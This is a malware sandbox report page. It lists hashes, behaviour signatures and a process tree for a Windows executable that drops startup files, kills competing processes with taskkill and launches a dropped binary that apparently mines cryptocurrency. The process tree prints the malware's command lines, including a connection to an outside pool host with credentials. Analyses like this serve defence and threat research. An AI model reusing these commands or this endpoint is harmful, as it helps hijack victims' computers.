Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

fe9d34a364...18.exe

windows7-x64

7

fe9d34a364...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    143s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/09/2024, 13:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe

  • Size

    388KB

  • MD5

    fe9d34a3640baa4564147b746b74eacc

  • SHA1

    d4474ee31c77d6764c282a0bdfe4603c5c85a076

  • SHA256

    47970273eefc3121742df7535363b7f67898d6a2633b04c2b534e20278ac840a

  • SHA512

    47eafe81e5ba9c073d12d6de8706ba4ec82eac0c02c19c3fd0554bdca51d9ea702e66775d9786e2fd20a0182f14853e420cb512e8d7dce8eec27467202efcb98

  • SSDEEP

    12288:6utrzh9xOXkFK1F9PVjIqYivDNkNwWO5RFg:6utr5OUFeBTvDyiWO5Ru

Score
7/10
discovery

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 4 IoCs
    evasion
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe
      "C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4832
      • C:\Users\Admin\AppData\Local\Temp\hid.exe
        "C:\Users\Admin\AppData\Local\Temp\hid.exe" /NOCONSOLE yz.bat
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4368
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c yz.bat
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3892
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 2 127.0.0.1
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3060
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im svchoost.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2296
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im mamita.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1536
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im x11811.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1248
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im Winlogon2.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2268
          • C:\Users\Admin\AppData\Local\Temp\x30811.exe
            x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3616

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\hid.exe
    Filesize

    43KB

    MD5

    3286462b2bc957ff6cada40a2d017745

    SHA1

    08346b5b0dee4a29e70f8a138963319343e8ad47

    SHA256

    f95cd8d865244cecbea788b6512fb0c0e55a679348f3759d955406f49e5863bc

    SHA512

    e1d069951cb13bf91e0da17a4f751a248b53d31f49b72cbd8c2bd1085778fbeae1e41518b90fd6e819e946a7bee23ca669579a330a07b524ef05c3501bd508e2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\x30811.exe
    Filesize

    988KB

    MD5

    80adb053ec8e370d72bcb7d22bc43a49

    SHA1

    8c8231cab08d034eae9d0a4653b72afb332ca0ba

    SHA256

    0d2b53402d5e65491678e6a7f7b0fc567d9f1d29531ee3a03f3d85c9d972ed48

    SHA512

    703ae0f9025be4b39664a0f8e4b697d04ba1d4e02a95dc858b3f0276cdd1f0802a478a73636824ede11ecfab1c717ab5e25a755f945a11ef0af7a93a3fef12a3

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\yz.bat
    Filesize

    222B

    MD5

    0f876659eb0993516447fab200891274

    SHA1

    d5f1bc306a214a9b5eeea52e7591d6e517354388

    SHA256

    0546b520a146326f206ece905772d8b1244497ddd9659266aff16e68aed8c007

    SHA512

    12d1f829f4538871169a2438817c428521009c1836d07b9c1e9f973598908ba5ef1d2faf29c840a17d2c986f08a1f78adcdd70b57cde72793a1abab55934d9d9

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe
    Filesize

    340KB

    MD5

    9047319b255a3d0a74addaa246375c05

    SHA1

    9314aa2522e9a4a1100ffcd54b1d457872f2fb8d

    SHA256

    b6ce3088e0f6d71e60188628f678b4665f25d5282c913415fe0fbd3f5dbea37f

    SHA512

    73154dd4c3779014e5e2ea1f531fb311045bdebf29fa5eb32727b321add002b8429e0b80262a1dbea3619fb7765d187e3160d1aafdd6b4009db84f92c560b85d

    Download Submit

  • memory/3616-32-0x0000000000400000-0x00000000004FC000-memory.dmp

    Filesize

    1008KB

    Download

  • memory/3664-0-0x0000000000400000-0x0000000000436000-memory.dmp

    Filesize

    216KB

    Download

  • memory/3664-10-0x0000000000400000-0x0000000000436000-memory.dmp

    Filesize

    216KB

    Download